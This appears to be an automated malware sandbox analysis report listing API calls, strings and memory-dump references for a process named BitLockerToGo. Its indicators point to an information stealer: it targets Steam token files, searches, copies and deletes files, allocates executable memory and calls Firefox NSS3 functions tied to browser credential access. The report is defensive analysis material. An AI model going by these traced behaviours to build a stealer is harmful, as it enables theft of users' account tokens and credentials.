                                                                                                                                                                                                                                                                                                                    • API String ID: 1823113695-2556327735
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c9662fd55de98ebfed1f57d417472071040b86ef2749fb9fef854e4bc1b67143
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8601f90585f5050e208f41fab576d352befcf1c8889f6efa1c82ec5aa8938efd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9662fd55de98ebfed1f57d417472071040b86ef2749fb9fef854e4bc1b67143
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0C23134425D6FDB31997C888083F6696FBA132D3240E2AE393D72C3E661D8808B69
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catch_memmove
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3914490576-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 557b78d9d83d0127f7d8fd21865163ed9f1afce5f4ef907bc0e0cd71db531083
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0e08cf7d96f341b1ce753933ea557edacd3a198168d71dfc292ddbbdf64c8e3e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 557b78d9d83d0127f7d8fd21865163ed9f1afce5f4ef907bc0e0cd71db531083
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213031A0130D9FDB249F68884167EB7A2FBD0320F204619E561DB2C2C775A9909B91
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F8D4D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 008F8D5D
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                                                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 502913869-3507145866
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3ee18e925e029d0d2cb3cb366e8711ae4de6137f865fd97af36d4097ba8c94d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e324e48193f11220ec3371c544e79980421007e2c47cc66f8f5caf139029c1f1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ee18e925e029d0d2cb3cb366e8711ae4de6137f865fd97af36d4097ba8c94d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE010832E0000DAB8F00FBBADC478DEBB78FF41354F510161BA00E3252DA316A5686A2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throwmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3608276449-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 19486318639b248b49fba2aed370daaa4b986bbf9c2e1ff60c65586489cca0a3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 50386ab1e09c98f50b5ce2ef50e5f6feecfe55b1998bc2698a0fbdb200e81158
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19486318639b248b49fba2aed370daaa4b986bbf9c2e1ff60c65586489cca0a3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29D05B3470420D7ADF117739DC054D97F58EE407787108210BA25E70D3E7B0D9918985
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F80C7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F80E5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7D67
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindFirstFileA.KERNEL32(?,?), ref: 008F7D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF4), ref: 008F7D9F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF8), ref: 008F7DB9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7DE0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,009176B6), ref: 008F7DF4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E11
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: PathMatchSpecA.SHLWAPI(?,?), ref: 008F7E3E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?), ref: 008F7E74
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B10), ref: 008F7E86
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7E99
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B14), ref: 008F7EAB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7EBF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E28
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: CopyFileA.KERNEL32(?,?,00000001), ref: 008F7F78
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: DeleteFileA.KERNEL32(?), ref: 008F7FEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindNextFileA.KERNEL32(?,?), ref: 008F804E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindClose.KERNEL32(?), ref: 008F8062
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2104210347-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: dc5840b6246a7598bf189fe596ebd96f51bc210ede93d0bfac45f6041f93a492
                                                                                                                                                                                                                                                                                                                    • Instruction ID: fc3e89f87666eb3f93c041566c525c2b4288fb36050d58ac59c6219360f4eb2b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc5840b6246a7598bf189fe596ebd96f51bc210ede93d0bfac45f6041f93a492
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0317E7690000DAFDF26EBA8DC03DF87779FB58308F5408A5B604E3261DA715A968F62
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,008E7B48,?,?), ref: 008E777A
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 008E77A4
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47ab052c3c1224f650ec307dd9920f4b1cf0b45560c917133fa5fdf5f359c4a3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c5974c3f39f1e311aaf8f00ee54d62e1c1dc8a35bb3d117999093b4e04849baa
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47ab052c3c1224f650ec307dd9920f4b1cf0b45560c917133fa5fdf5f359c4a3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A11BE75604745ABC720CFB5CD84BAAB7F4FB46714F20482DE61AD7290D270AD40CB10
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2120,6CAA7E60), ref: 6CAA6EBC
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA6EDF
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA6EF3
                                                                                                                                                                                                                                                                                                                    • PR_WaitCondVar.NSS3(000000FF), ref: 6CAA6F25
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA7A900: TlsGetValue.KERNEL32(00000000,?,6CBF14E4,?,6CA14DD9), ref: 6CA7A90F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA7A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA7A94F
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA6F68
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000008), ref: 6CAA6FA9
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA70B4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA70C8
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF24C0,6CAE7590), ref: 6CAA7104
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAA7117
                                                                                                                                                                                                                                                                                                                    • SECOID_Init.NSS3 ref: 6CAA7128
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000057), ref: 6CAA714E
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA717F
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA71A9
                                                                                                                                                                                                                                                                                                                    • PR_NotifyAllCondVar.NSS3 ref: 6CAA71CF
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA71DD
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAA71EE
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAA7208
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7221
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000001), ref: 6CAA7235
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA724A
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA725E
                                                                                                                                                                                                                                                                                                                    • PR_NotifyCondVar.NSS3 ref: 6CAA7273
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA7281
                                                                                                                                                                                                                                                                                                                    • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAA7291
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA72B1
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA72D4
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA72E3
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7301
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7310
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7335
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7344
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7363
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7372
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CBE0148,,defaultModDB,internalKeySlot), ref: 6CAA74CC
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7513
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA751B
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7528
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA753C
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7550
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7561
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7572
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7583
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7594
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA75A2
                                                                                                                                                                                                                                                                                                                    • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CAA75BD
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA75C8
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA75F1
                                                                                                                                                                                                                                                                                                                    • PR_NewLock.NSS3 ref: 6CAA7636
                                                                                                                                                                                                                                                                                                                    • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAA7686
                                                                                                                                                                                                                                                                                                                    • PR_NewLock.NSS3 ref: 6CAA76A2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB598D0: calloc.MOZGLUE(00000001,00000084,6CA80936,00000001,?,6CA8102C), ref: 6CB598E5
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000050), ref: 6CAA76B6
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CAA7707
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CAA771C
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CAA7731
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CAA774A
                                                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 6CAA7770
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAA7779
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA779A
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA77AC
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(-0000000D), ref: 6CAA77C4
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAA77DB
                                                                                                                                                                                                                                                                                                                    • strrchr.VCRUNTIME140(?,0000002F), ref: 6CAA7821
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?), ref: 6CAA7837
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAA785B
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAA786F
                                                                                                                                                                                                                                                                                                                    • SECMOD_AddNewModuleEx.NSS3 ref: 6CAA78AC
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA78BE
                                                                                                                                                                                                                                                                                                                    • SECMOD_AddNewModuleEx.NSS3 ref: 6CAA78F3
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA78FC
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA791C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • Spac, xrefs: 6CAA7389
                                                                                                                                                                                                                                                                                                                    • ,defaultModDB,internalKeySlot, xrefs: 6CAA748D, 6CAA74AA
                                                                                                                                                                                                                                                                                                                    • kbi., xrefs: 6CAA7886
                                                                                                                                                                                                                                                                                                                    • dll, xrefs: 6CAA788E
                                                                                                                                                                                                                                                                                                                    • sql:, xrefs: 6CAA76FE
                                                                                                                                                                                                                                                                                                                    • dbm:, xrefs: 6CAA7716
                                                                                                                                                                                                                                                                                                                    • extern:, xrefs: 6CAA772B
                                                                                                                                                                                                                                                                                                                    • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CAA74C7
                                                                                                                                                                                                                                                                                                                    • NSS Internal Module, xrefs: 6CAA74A2, 6CAA74C6
                                                                                                                                                                                                                                                                                                                    • rdb:, xrefs: 6CAA7744
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
